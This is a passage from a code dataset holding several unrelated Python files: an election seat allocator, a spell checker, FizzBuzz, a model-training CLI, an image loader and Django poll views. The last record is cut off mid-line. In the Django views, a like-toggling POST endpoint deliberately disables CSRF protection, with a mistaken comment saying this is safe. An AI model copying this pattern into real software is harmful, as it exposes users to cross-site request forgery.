seats)\n\n        if method == 4:\n            websterSainteLague(winnerKey)\n\n\n        # Prints a warning if there's a tie between at least 2 quotas in the calculation\n        if len(winnerKeys) > 1:\n            print(\"WARNING! - There was a tie between \" + str(winnerKeys) + \". The seat went to the party that you \"\n                  \"entered first in the beginning.\")\n\n        # Give seat to winner & calculate new quota\n        wonSeats[winnerKey] = wonSeats[winnerKey] + 1\n        allocatedSeats += 1\n\n    print(\"\\n==== RESULTS ====\")\n    for key in wonSeats:\n        # See comment @ line 71: wonSeats - 1 because we started counting at 1\n        print(\"Amount of seats for %s: %s\" % (key, (wonSeats[key] - 1)))\n\n    # For windows users who use the python launcher\n    x = input(\"\\nPress 'ENTER' to exit... \")\n    if len(x) >= 0:\n        quit()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"proportional-representation.py","file_name":"proportional-representation.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"564104556","text":"import re, collections\r\ndef words(text):\r\n    return re.findall('[a-z]+', text.lower())  # split the words out of the text and return a list\r\ndef train(features):\r\n    model = collections.defaultdict(lambda: 1)\r\n    for f in features:\r\n        model[f] += 1\r\n    return model\r\nNWORDS = train(words(open('dictionary.txt').read()))\r\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\r\n\r\ndef edits1(word):\r\n    splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]\r\n    deletes = [a + b[1:] for a, b in splits if b]\r\n    transposes = [a + b[1] + b[0] + b[2:] for a, b in splits if len(b)>1]\r\n    replaces = [a + c + b[1:] for a, b in splits for c in alphabet if b]\r\n    inserts = [a + c + b for a, b in splits for c in alphabet]\r\n    return set(deletes + transposes + replaces + inserts)\r\n\r\ndef known_edits2(word):\r\n    return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)\r\n\r\ndef known(words):\r\n    return set(w for w in words if w in NWORDS)\r\n\r\ndef correct(word):\r\n    candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]\r\n    # print(candidates)\r\n    mylist=[]\r\n    M1 = max(candidates, key=NWORDS.get)\r\n    print(M1)\r\n    candidates.remove(M1)\r\n    mylist.append(M1)\r\n    if(candidates):\r\n        M2 = max(candidates, key=NWORDS.get)\r\n        mylist.append(M2)\r\n        print(M2)\r\n        candidates.remove(M2)\r\n        if(candidates):\r\n            M3 = max(candidates, key=NWORDS.get)\r\n            mylist.append(M3)\r\n            print(M3)\r\n\r\n    return mylist\r\n\r\nwhile True:\r\n    userInput = input(\"Enter your word:\")\r\n    correct(userInput)\r\n    # print(correct(userInput))","sub_path":"spelling_checker.py","file_name":"spelling_checker.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"386717395","text":"from typing import List\n\n\nclass Solution:\n    def fizzBuzz(self, n: int) -> List[str]:\n        mDict = {3: \"Fizz\", 5: \"Buzz\"}\n        ret = []\n        for i in range(1, n+1):\n            string = \"\"\n            for key, value in mDict.items():\n                if i % key == 0:\n                    string += value\n            if not string:\n                string += str(i)\n            ret.append(string)\n        return ret
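\n\n# [Editor's usage sketch] Solution().fizzBuzz(5) returns\n# [\"1\", \"2\", \"Fizz\", \"4\", \"Buzz\"]; because mDict preserves insertion\n# order (3 before 5), multiples of 15 concatenate to \"FizzBuzz\".\n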
","sub_path":"412. Fizz Buzz/solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"7059826","text":"import argparse\nimport os\nfrom tornado.options import parse_config_file\nfrom kb.settings import build_app_config\nfrom kb.command import TrainDoc2vecController, TrainLDAController, TrainKMeansController, MetricsController, TrainDoc2vecMongoController\n\nos.environ['TZ'] = 'UTC'\n\ncommands_available = {\n    'traind2v': TrainDoc2vecController,\n    'traind2vm': TrainDoc2vecMongoController,\n    'trainlda': TrainLDAController,\n    'trainkm': TrainKMeansController,\n    'metrics': MetricsController\n}\n\n\ndef CMD(cmd_options, settings):\n    def _runner(controller_object):\n        controller_object.run_main()\n\n    cmd = cmd_options.command\n    controller = commands_available[cmd](settings=settings, cmd_options=cmd_options)\n    _runner(controller)\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--command\", dest=\"command\",\n                        help=\"choose command to execute\",\n                        metavar=\"\")\n    parser.add_argument(\"--lang\", dest=\"lang\",\n                        help=\"Choose the language\",\n                        metavar=\"\")\n    parser.add_argument(\"--config\",\n                        dest=\"config\",\n                        help=\"path to config file\",\n                        metavar=\"\")\n    parser.add_argument(\"--mongo_host\",\n                        dest=\"mongo_host\",\n                        help=\"Mongo host address\",\n                        metavar=\"\")\n    parser.add_argument(\"--mongo_port\",\n                        dest=\"mongo_port\",\n                        help=\"Mongo port\",\n                        metavar=\"\")\n    parser.add_argument(\"--speller_enable\", dest=\"speller_enable\",\n                        help=\"Enabling spell corrector\",\n                        metavar=\"\")\n    parser.add_argument(\"--classifier_model\",\n                        dest=\"classifier_model\",\n                        help=\"path to model file\",\n                        metavar=\"\")\n    parser.add_argument(\"--classifier_model_eval\",\n                        dest=\"classifier_model_eval\",\n                        help=\"evaluate model with test split. Type Int in a range between 0 - 100\",\n                        metavar=\"\")\n    parser.add_argument(\"--topn_return\",\n                        dest=\"topn_return\",\n                        help=\"number of predictions to return ('-1' for a full list)\",\n                        metavar=\"\")\n    parser.add_argument(\"--input\",\n                        dest=\"input\",\n                        help=\"Train: path to CSV trainset file. Predict: path to CSV file to predict\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--output\",\n                        dest=\"output\",\n                        help=\"Train: name for a model file. Predict: name for a prediction CSV file.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--csv_input_sep\",\n                        dest=\"csv_input_sep\",\n                        help=\"sep for input CSV file.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--csv_output_sep\",\n                        dest=\"csv_output_sep\",\n                        help=\"sep for output CSV file.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--train_on_csv\",\n                        dest=\"train_on_csv\",\n                        help=\"Get train data from MongoDB.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--clusterizer_vec_mindf\",\n                        dest=\"clusterizer_vec_mindf\",\n                        help=\"Minimum doc frequency for a term.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--clusterizer_vec_maxdf\",\n                        dest=\"clusterizer_vec_maxdf\",\n                        help=\"Maximum doc frequency for a term.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--target_col\",\n                        dest=\"target_col\",\n                        help=\"Target column in CSV.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--label_col\",\n                        dest=\"label_col\",\n                        help=\"Label column in CSV.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--clusterizer_preprocess_jobs\",\n                        dest=\"clusterizer_preprocess_jobs\",\n                        help=\"Number of processes to preprocess data.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--clusterizer_upperbound_len\",\n                        dest=\"clusterizer_upperbound_len\",\n                        help=\"The upper bound of message length to clusterize.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--clusterizer_train_limit\",\n                        dest=\"clusterizer_train_limit\",\n                        help=\"The upper bound of the number of messages to clusterize.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--frac\",\n                        dest=\"frac\",\n                        help=\"The percentage of messages to clusterize of the total.\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--import_from_csv\",\n                        dest=\"import_from_csv\",\n                        help=\"Import: path to CSV file with data\\r\",\n                        metavar=\"\")\n    parser.add_argument(\"--tokenizer\",\n                        dest=\"tokenizer\",\n                        help=\"Path to the tokenizer\\r\",\n                        metavar=\"\")\n\n    args = parser.parse_args()\n
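    # [Editor's usage sketch - hypothetical invocation] flags override the\n    # config file values loaded below, e.g.:\n    #   python kb/cmd.py --command traind2v --lang en --config ./config.py\n    # any option left unset keeps the value from the config file.\n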
    if not args.command or args.command not in commands_available:\n        parser.print_help()\n    else:\n        default_config_name = 'config.py'\n        default_config_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../', default_config_name))\n        config = args.config if args.config else default_config_path\n        parse_config_file(config, final=False)\n        # settings = options.group_dict('application')\n        settings = build_app_config()\n\n        if args.lang:\n            settings['lang'] = args.lang\n        if args.mongo_host:\n            settings['mongo_host'] = args.mongo_host\n        if args.mongo_port:\n            settings['mongo_port'] = args.mongo_port\n        if args.speller_enable:\n            # bool() of any non-empty string is True, so parse the flag explicitly\n            settings['speller_enable'] = args.speller_enable.lower() in ('1', 'true', 'yes')\n        if args.tokenizer:\n            settings['tokenizer'] = args.tokenizer\n        if args.classifier_model:\n            settings['classifier_model'] = args.classifier_model\n        if args.classifier_model_eval:\n            settings['classifier_model_eval'] = int(args.classifier_model_eval)\n        if args.topn_return:\n            settings['topn_return'] = int(args.topn_return)\n        if args.input:\n            settings['input'] = args.input\n        if args.output:\n            settings['output'] = args.output\n        if args.csv_input_sep:\n            settings['csv_input_sep'] = args.csv_input_sep\n        if args.csv_output_sep:\n            settings['csv_output_sep'] = args.csv_output_sep\n        if args.train_on_csv:\n            settings['train_on_csv'] = args.train_on_csv\n        if args.clusterizer_vec_mindf:\n            settings['clusterizer_vec_mindf'] = int(args.clusterizer_vec_mindf)\n        if args.clusterizer_vec_maxdf:\n            settings['clusterizer_vec_maxdf'] = int(args.clusterizer_vec_maxdf)\n        if args.target_col:\n            settings['target_col'] = args.target_col\n        if args.label_col:\n            settings['label_col'] = args.label_col\n        if args.clusterizer_preprocess_jobs:\n            settings['clusterizer_preprocess_jobs'] = int(args.clusterizer_preprocess_jobs)\n        if args.clusterizer_upperbound_len:\n            settings['clusterizer_upperbound_len'] = int(args.clusterizer_upperbound_len)\n        if args.clusterizer_train_limit:\n            settings['clusterizer_train_limit'] = int(args.clusterizer_train_limit)\n        if args.frac:\n            settings['frac'] = float(args.frac)\n        if args.import_from_csv:\n            settings['import_from_csv'] = args.import_from_csv\n\n        CMD(cmd_options=args, settings=settings)\n","sub_path":"kb/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"302633729","text":"from scipy import misc\nimport sys\nsys.path.append('/data/ilsvrc/')\nimport numpy as np\n\n###--- Importing the data: names and labels of the jpg files -----\nname=[]\nlabels={}\nf=open('/data/ilsvrc/train_name.txt','r')\nfor i in range(1280976):\n    name.append(f.readline())\n\nf=open('/data/ilsvrc/ILSVRC2012_devkit_t12/data/labels.dat','r')\nfor i in range (1000):\n    temp=f.readline().split()\n    labels[temp[0]]=int(temp[1])\n\ndef get_name(index):\n    temp=name[index]\n    return temp[:(len(temp)-1)]\n\ndef get_label(name):\n    return labels[name[:9]]\n\n####-------- Loading the .jpg images -----------\n\ndef load_data(index):\n    X_train = np.zeros((len(index), 3, 256,256), dtype=\"uint8\")\n    y_train = np.zeros((len(index),), dtype=\"uint8\")\n    for i in range(len(index)):\n        name = get_name(index[i])\n        path=\"/data/ilsvrc/train/\" + str(name)\n        X_train[i] = misc.imread(path).transpose()\n        y_train[i] = get_label(name)\n    return X_train, y_train","sub_path":"keras/datasets/in_batch.py","file_name":"in_batch.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"26807049","text":"from django.http import HttpResponse, JsonResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom polls.models import PollItem, PollVoting, PollFav, Ptype, SuggestedPoll\nfrom django.views.generic import TemplateView, ListView, DetailView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView, FormView, FormMixin\nfrom users.models import PUser\nfrom django.contrib import messages\nfrom django.conf import settings\n# from variables.models import Ptype\nfrom mixins.mixins import LoginRequiredMixin, UserChangeManagerMixin, PollTypeMixin\nfrom polls.forms import PollItemAddForm, PollItemEditForm, PollItemDeleteForm, PollTopicAddForm, PollTopicEditForm, SearchForm, PollSuggAddForm, PollRecoAddForm\nfrom django.core.urlresolvers import reverse\nfrom tags.models import TagPoll, runtagcount\nfrom variable.models import TypeTopic, TypeYear, TypeLocation\nfrom analytics.models import ViewPollTypeUnique, ViewPollItemsUnique\nfrom django.db.models import Q\nfrom datetime import datetime, timedelta\nfrom analytics.models import ScorePollItemsByMonth\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.mail import send_mail\nfrom messaging.models import Message\nfrom messaging.forms import PollItemMessageAddForm, PollItemMessageUpdateForm\nfrom django.core.cache import cache\nfrom analytics.models import PostReport\nfrom notifications.signals import notify\nimport json\n# import pandas as pd\nfrom django.db.models import Q\nimport numpy as np\nimport pytz\nfrom pytz import timezone\nfrom django.utils.timezone import utc\n# import datetime\nfrom itertools import chain\nfrom notifications.models import Notification\nimport time\nfrom celery import shared_task, task, app\nfrom analytics.models import ControlTable\n\n\n\n\n\n@task()\ndef async_report_mail(subject, contact_message, from_email, to_email):\n    send_mail(\n        subject=subject,\n        message=\"\",\n        html_message=contact_message,\n        from_email=from_email,\n        recipient_list=to_email,\n        fail_silently=False\n    )\n\n
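\n# [Editor's usage sketch - hypothetical values] as a shared celery task this\n# is normally queued off the request cycle rather than called inline, e.g.:\n# async_report_mail.delay(\"Post report\", \"<p>details</p>\",\n#                         settings.DEFAULT_FROM_EMAIL, [\"admin@example.com\"])\n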
\n\n###################################\n######### Polltopicsfilter ########\n###################################\n\n\n\n\n\nclass PollTopicsView(ListView, FormView):\n    model = Ptype\n    template_name = \"polls/polls_types.html\"\n    form_class = SearchForm\n    # paginate_by = 10\n\n\n    # def get(self, *args, **kwargs):\n    #     # if kwargs['username'] != request.user.username:\n    #     #     return redirect('index')\n\n    #     reset = \"hello\"\n    #     if reset:\n    #         return HttpResponseRedirect('?year=All&location=&poll=')\n\n    #     return super(PollTopicsView, self).get(*args, **kwargs)\n\n\n    def dispatch(self, *args, **kwargs):\n        dispatch = super(PollTopicsView, self).dispatch(*args, **kwargs)\n        # redirect to user create if the terms-and-conditions checkbox was not checked but the user has signed in\n        if self.request.user.is_authenticated:\n            try: \n                test = PUser.objects.get(user_id=self.request.user.id)\n            except:\n                return redirect('PUserCreate')\n\n        return dispatch\n\n\n    def get_context_data(self, **kwargs):\n        context = super(PollTopicsView, self).get_context_data(**kwargs)\n\n\n        # if the user clicks on the quick links from the base page there is no saved session,\n        # so 'cat' would not capture anything and would raise an error; therefore 'cat' is specified as pop\n\n        # if self.request.GET.get('cat') is None:\n        #     category = self.request.session[\"cat\"]\n        # else:\n        #     category = self.request.GET.get('cat')\n        #     self.request.session[\"cat\"] = category\n\n\n        search = self.request.GET.get('search')\n\n        todate = datetime.today()\n        fromdate = datetime.today() - timedelta(days=365)\n\n        if search:\n\n            psearch = Ptype.objects.filter(Q(title__icontains=search) | \n                                           Q(description__icontains=search))\n\n            psearch = psearch.filter(active=True, date__gte=fromdate, date__lte=todate)\n\n            # polllist = psearch.filter(active=True).exclude(id__in=[1,2]).order_by('-date')\n            polllist = psearch.filter(active=True).order_by('-date')\n\n\n            # if category == \"Late\":\n            #     context['polltype'] = \"Latest\"\n            #     polllist = psearch.filter(active=True).exclude(id__in=[1,2]).order_by('-date')\n\n            # if category == \"Vote\":\n            #     context['polltype'] = \"Most Votes\"\n            #     polllist = psearch.filter(active=True).exclude(id__in=[1,2]).order_by('vote_count')\n\n            # if category == \"Pop\":\n            #     context['polltype'] = \"Most Popular\"\n            #     # get top most popular for views\n            #     topview_lst = ViewPollTypeUnique.objects.filter().order_by('vcount')[:50]\n            #     topview_lst_id = topview_lst.values(\"p_type_id\")\n            #     polllist = psearch.filter(active=True, id__in=topview_lst_id).exclude(id__in=[1,2])\n\n        else:\n\n            cattype = self.request.GET.get('cattype')\n            context['Cattype'] = ['Popular','Most-Votes']\n\n            # year = self.request.GET.get('year')\n            # year = TypeYear.objects.filter(title=year)\n\n            location = self.request.GET.get('location')\n            location = TypeLocation.objects.filter(title=location)\n\n            pollcat = self.request.GET.get('poll')\n            pollcat = TypeTopic.objects.filter(title=pollcat)\n\n            Yeartype = Ptype.objects.values('year').distinct()\n            context['Yeartype'] = TypeYear.objects.filter(active=True).order_by('title')\n\n            Locationtype = Ptype.objects.values('location').distinct()\n            context['Locationtype'] = TypeLocation.objects.filter(active=True).order_by('title')\n\n            Topictype = Ptype.objects.values('topic').distinct()\n            context['Topictype'] = TypeTopic.objects.filter(active=True).order_by('title')\n\n\n            if cattype == \"All\" or not cattype:\n                cattype = \"Latest\"\n\n\n\n            # if year.first() is not None:\n            #     year = str(year.first())\n\n            if cattype == \"Latest\":\n                context['polltype'] = \"Latest\"\n                polllist = Ptype.objects.filter(active=True).order_by('-date')\n                # if year and not year == \"All\":\n                #     polllist = polllist.filter(date__year=year)\n                if location and not location == \"All\":\n                    polllist = polllist.filter(location=location)\n                if pollcat and not pollcat == \"All\":\n                    polllist = polllist.filter(topic=pollcat)\n\n                # print (dir(polllist.first()))\n\n            if cattype == \"Most-Votes\":\n                context['polltype'] = \"Most Votes\"\n                polllist = Ptype.objects.filter(active=True).order_by('vote_count')\n                # if year and not year == \"All\":\n                #     polllist = polllist.filter(date__year=year)\n                if location and not location == \"All\":\n                    polllist = polllist.filter(location=location)\n                if pollcat and not pollcat == \"All\":\n                    polllist = polllist.filter(topic=pollcat)\n\n            if cattype == \"Popular\":\n                context['polltype'] = \"Most Popular\"\n                # get top most popular for views\n                topview_lst = ViewPollTypeUnique.objects.filter().order_by('vcount')[:50]\n                topview_lst_id = topview_lst.values(\"p_type_id\")\n                polllist = Ptype.objects.filter(active=True, id__in=topview_lst_id)\n                # if year and not year == \"All\":\n                #     polllist = polllist.filter(date__year=year)\n                if location and not location == \"All\":\n                    polllist = polllist.filter(location=location)\n                if pollcat and not pollcat == \"All\":\n                    polllist = polllist.filter(topic=pollcat)\n\n\n\n        # numbers_list = range(1, 1000)\n\n        polllist_list = polllist\n        page = self.request.GET.get('page', 1)\n        paginator = Paginator(polllist_list, 10)  # 10 items per page\n\n        try:\n            polllist = paginator.page(page)\n        except PageNotAnInteger:\n            polllist = paginator.page(1)\n        except EmptyPage:\n            polllist = paginator.page(paginator.num_pages)\n        \n        context['polllist'] = polllist\n        # this is for testing infinite pagination:\n        # import time\n        # time.sleep(1)\n\n\n        # context['polllist'] = polllist[:50]\n\n        return context\n\n
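\n\n# [Editor's note] the Paginator + PageNotAnInteger/EmptyPage fallbacks used in\n# PollTopicsView above are the stock Django pagination recipe; a minimal\n# standalone sketch of the same idea (never called here):\ndef _safe_page(queryset, page, per_page=10):\n    paginator = Paginator(queryset, per_page)\n    try:\n        return paginator.page(page)\n    except PageNotAnInteger:\n        return paginator.page(1)\n    except EmptyPage:\n        return paginator.page(paginator.num_pages)\n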
\n\nclass PollSearchView(TemplateView):\n    template_name = 'polls/polls_search.html'\n\n    def get_context_data(self, **kwargs):\n        context = super(PollSearchView, self).get_context_data(**kwargs)\n        search = self.request.GET.get('search')\n        # items = Ptype.objects.filter(description=search)\n        items = TagPoll.objects.filter(title=search)\n\n        context[\"pitems\"] = items\n\n        return context\n\n\n\n\n\n###################################\n######### Pollsuggest #############\n###################################\n\n\n\n\n# class PollSuggView(LoginRequiredMixin, ListView):\n#     model = SuggestedPoll\n#     template_name = \"polls/poll_suggest_view.html\"\n#     paginate_by = 10\n#     context_object_name = 'SuggPoll'\n#     queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n\n#     def dispatch(self, *args, **kwargs):\n#         dispatch = super(PollSuggView, self).dispatch(*args, **kwargs)\n#         return dispatch\n\n#     def get_queryset(self):\n#         new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\").order_by('-score')[:5]\n#         return new_context\n\n#     def get_context_data(self, **kwargs):\n#         context = super(PollSuggView, self).get_context_data(**kwargs)\n#         return context\n\n\n\n\n# all users can suggest\n\n
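# [Editor's note] the views below build a timezone-aware \"last 90 days\"\n# window with pytz.utc.localize(datetime.utcnow()); a minimal sketch of the\n# idiom (never called here):\ndef _last_90_days():\n    now = pytz.utc.localize(datetime.utcnow())\n    return now - timedelta(days=90), now\n\n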
class PollRecoView(LoginRequiredMixin, ListView, FormView):\n    model = SuggestedPoll\n    template_name = \"polls/poll_recommend_view.html\"\n    paginate_by = 5\n    context_object_name = 'RecoPoll'\n    form_class = PollRecoAddForm\n\n    # queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n    def dispatch(self, *args, **kwargs):\n        dispatch = super(PollRecoView, self).dispatch(*args, **kwargs)\n        # redirect to user create if the terms-and-conditions checkbox was not checked but the user has signed in\n        if self.request.user.is_authenticated:\n            try: \n                test = PUser.objects.get(user_id=self.request.user.id)\n            except:\n                return redirect('PUserCreate')\n\n        return dispatch\n\n\n\n    def get_queryset(self):\n        # #original\n        # new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\").order_by('-date')\n        sort = self.request.GET.get('sort', None)\n\n        # shortlist only the recommendations from the last 90 days, ranked by votes or by date\n        d = datetime.utcnow()\n        nowdate = pytz.utc.localize(d)\n        enddate = nowdate - timedelta(days=90)\n\n        if sort == \"Score\":\n            new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\", date__range=(enddate, nowdate)).order_by('-score')\n        else:\n            new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\", date__range=(enddate, nowdate)).order_by('-date')\n\n        return new_context\n\n    def get_context_data(self, **kwargs):\n        context = super(PollRecoView, self).get_context_data(**kwargs)\n        user = self.request.user\n        recolike = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\", vote_user=user)\n        context['recolike'] = recolike\n        context['form'] = self.form_class()\n\n\n        context[\"Addpost\"] = False\n        # If user is staff there is no time limit\n        if self.request.user.is_staff == True:\n            context[\"Addpost\"] = True\n\n        # timing\n        # check if the user can post, based on a delay after the user last posted\n\n        user = self.request.user\n        # if the user has not posted anything before\n        try:\n            # last time the user posted\n            lpostdate = SuggestedPoll.objects.filter(user_submit=user, typePoll='RS').last().date\n\n            d = datetime.utcnow()\n            nowdate = pytz.utc.localize(d)\n            # okdate = lpostdate + timedelta(hours=1)\n            okdate = lpostdate + timedelta(minutes=1)\n\n            if nowdate >= okdate:\n                context[\"Addpost\"] = True\n            else:\n                timeleft = okdate - nowdate\n                days, hours, minutes = timeleft.days, timeleft.seconds // 3600, timeleft.seconds // 60 % 60\n\n                context[\"Hours\"] = hours\n                context[\"Minutes\"] = minutes\n\n        except:\n            context[\"Addpost\"] = True\n\n        return context\n\n    def form_valid(self, form):\n        i = form.save(commit=False)\n        i.typePoll = 'RS'\n        i.title = form.cleaned_data.get(\"title\")\n        i.user_submit = self.request.user\n        i.allowed = True\n        i.save()\n\n        valid_data = super(PollRecoView, self).form_valid(form)\n        return JsonResponse('ok', safe=False)\n\n\n    def form_invalid(self, form, **kwargs):\n        return_dict = dict()\n        e = form.errors['title'].as_text()\n        return_dict['error'] = str(e)\n        return JsonResponse(return_dict)\n\n\n    def get_success_url(self):\n        url = \"/polls/recommend/\"\n        messages.info(self.request, \"Your recommendation has been posted\")\n        return url\n\n
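\n# [Editor's note] form_valid/form_invalid above return JsonResponse rather\n# than redirecting, so the template's ajax handler decides what to render; a\n# failed title validation arrives as {\"error\": \"<message>\"} with HTTP 200.\n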
\"polls/poll_suggest_view.html\"\n paginate_by = 5\n context_object_name = 'SuggPoll'\n form_class = PollSuggAddForm\n\n # queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollSuggView, self).dispatch(*args, **kwargs)\n #redirect to user create checkbox on terms and conditions not checked but user has signed in\n if self.request.user.is_authenticated:\n try: \n test = PUser.objects.get(user_id=self.request.user.id)\n except:\n return redirect('PUserCreate')\n\n if self.request.user.puser.memberp == True or self.request.user.puser.member == True:\n pass\n else:\n messages.info(self.request, \"This is only for subscribers\")\n return redirect('Home')\n\n return dispatch\n\n\n def get_queryset(self):\n # #original\n # new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\").order_by('-date')\n sort = self.request.GET.get('sort', None)\n #this is for shortlisting only the reccommendations from this month and ranked by votes\n d = datetime.utcnow()\n nowdate = pytz.utc.localize(d)\n enddate = nowdate - timedelta(days=90)\n\n if sort == \"Score\":\n new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\", date__range=(enddate, nowdate)).order_by('-score')\n else:\n new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\", date__range=(enddate, nowdate)).order_by('-date')\n\n\n return new_context\n\n def get_context_data(self, **kwargs):\n context = super(PollSuggView, self).get_context_data(**kwargs)\n user = self.request.user\n sugglike = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\", vote_user=user)\n context['sugglike'] = sugglike\n context['form'] = self.form_class()\n\n context[\"Addpost\"] = False\n #If user is staff there is no time limit\n if self.request.user.is_staff == True:\n context[\"Addpost\"] = True\n\n # timing\n # check if user can post based on 1 hours after the user posted\n user = self.request.user\n # if the user has not posted anything before\n try:\n # last time the user posted\n lpostdate = SuggestedPoll.objects.filter(user_submit=user, typePoll='SG').last().date\n\n d = datetime.utcnow()\n nowdate = pytz.utc.localize(d)\n okdate = lpostdate + timedelta(hours=1)\n\n if nowdate >= okdate:\n context[\"Addpost\"] = True\n else:\n timeleft = okdate - nowdate\n days, hours, minutes = timeleft.days, timeleft.seconds // 3600, timeleft.seconds // 60 % 60\n\n context[\"Hours\"] = hours\n context[\"Minutes\"] = minutes\n\n except:\n context[\"Addpost\"] = True\n\n\n return context\n\n def form_valid(self, form):\n i = form.save(commit=False)\n i.typePoll = 'SG'\n i.title = form.cleaned_data.get(\"title\")\n i.user_submit = self.request.user\n i.allowed = True\n i.save()\n\n valid_data = super(PollSuggView, self).form_valid(form)\n return JsonResponse('ok', safe=False)\n\n\n def form_invalid(self, form, **kwargs):\n return_dict = dict()\n e = form.errors['title'].as_text()\n return_dict['error'] = str(e)\n return JsonResponse(return_dict)\n\n\n def get_success_url(self):\n url = \"/polls/suggestion/\"\n messages.info(self.request, \"Your suggestion has been posted\")\n return url\n\n\n\n\n\n@csrf_exempt # ok to exempt no input\ndef api_sugglikes(request):\n\n sugg_id = request.POST.get('sugg_id')\n\n if request.POST:\n if request.user.is_authenticated:\n\n sugg_id = request.POST.get('sugg_id')\n sugg_obj = SuggestedPoll.objects.filter(id=sugg_id, vote_user=request.user)\n\n if sugg_obj:\n # remove like\n 
\n@csrf_exempt  # ok to exempt, no input\ndef api_sugglikes(request):\n\n    sugg_id = request.POST.get('sugg_id')\n\n    if request.POST:\n        if request.user.is_authenticated:\n\n            sugg_obj = SuggestedPoll.objects.filter(id=sugg_id, vote_user=request.user)\n\n            if sugg_obj:\n                # remove like\n                sugg_obj.first().vote_user.remove(request.user)\n                result = \"unliked\"\n            else:\n                # add like\n                like = SuggestedPoll.objects.get(id=sugg_id)\n                like.vote_user.add(request.user)\n                result = \"liked\"\n\n            try:\n                sugglike_obj = SuggestedPoll.objects.get(id=sugg_id)\n                sugglike_obj.sugg_score()\n                likecount = sugglike_obj.score\n            except:\n                likecount = 0\n\n            # return JsonResponse({\"result\": result})\n            return JsonResponse({\"result\": result, \"resultc\": likecount })\n        else:\n            return JsonResponse({\"result\": \"error\", \"sugglike_obj\": \"login_required\"})\n\n\n    else:\n        return redirect('/')\n\n\n\n\n\n\n\n\n\n\n###################################\n######### Poll lists ##############\n###################################\n\n\n# Polltype creation\nclass PollListCreate(LoginRequiredMixin, CreateView):\n    model = Ptype\n    form_class = PollTopicAddForm\n    success_url = '/polls/'\n    template_name = 'polls/polls_topic_create.html'\n\n    def dispatch(self, *args, **kwargs):\n        dispatch = super(PollListCreate, self).dispatch(*args, **kwargs)\n\n\n        if self.request.user.is_authenticated:\n\n            try: \n                test = PUser.objects.get(user_id=self.request.user.id)\n            except:\n                return redirect('PUserCreate')\n\n            if self.request.user.is_staff == True:\n                pass\n            else:\n                return redirect('/')\n\n            # redirect the user if he is banned\n            user = self.request.user\n            userban = PUser.objects.get(user=user)\n\n            if userban.banned == True:\n                messages.info(self.request, \"You have been banned from posting, please contact us if you need help\")\n                return redirect('/')\n        return dispatch\n\n\n    # # queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n    # def dispatch(self, *args, **kwargs):\n    #     dispatch = super(PollRecoView, self).dispatch(*args, **kwargs)\n    #     # redirect to user create if the terms-and-conditions checkbox was not checked but the user has signed in\n    #     if self.request.user.is_authenticated:\n    #         try: \n    #             test = PUser.objects.get(user_id=self.request.user.id)\n    #         except:\n    #             return redirect('PUserCreate')\n\n    #     return dispatch\n\n\n    def get_context_data(self, **kwargs):\n        context = super(PollListCreate, self).get_context_data(**kwargs)\n\n\n        return context\n\n\n    def form_valid(self, form):\n        i = form.save(commit=False)\n        i.c_user = self.request.user\n        i.active = True\n        i.freepoll = True \n        i.save()\n\n        tag_names = form.cleaned_data['tags'].split(\",\")\n        for tag in tag_names:\n            if not tag == \" \":\n                tag = TagPoll.objects.get_or_create(title=str(tag).strip().lower())[0]\n                tag.polltype.add(i)\n                tc = TagPoll.objects.get(title=tag)\n                # countt = tc.polltype.count()\n                # tc.counter = countt\n                tc.save()\n\n        # refresh the count of all the polls attached to a tag\n        runtagcount()\n\n        # extract the users who favorited a tag attached to this poll list\n        userlist = TagPoll.objects.filter(polltype=i).values_list('tagfav',flat=True)\n        userlist = 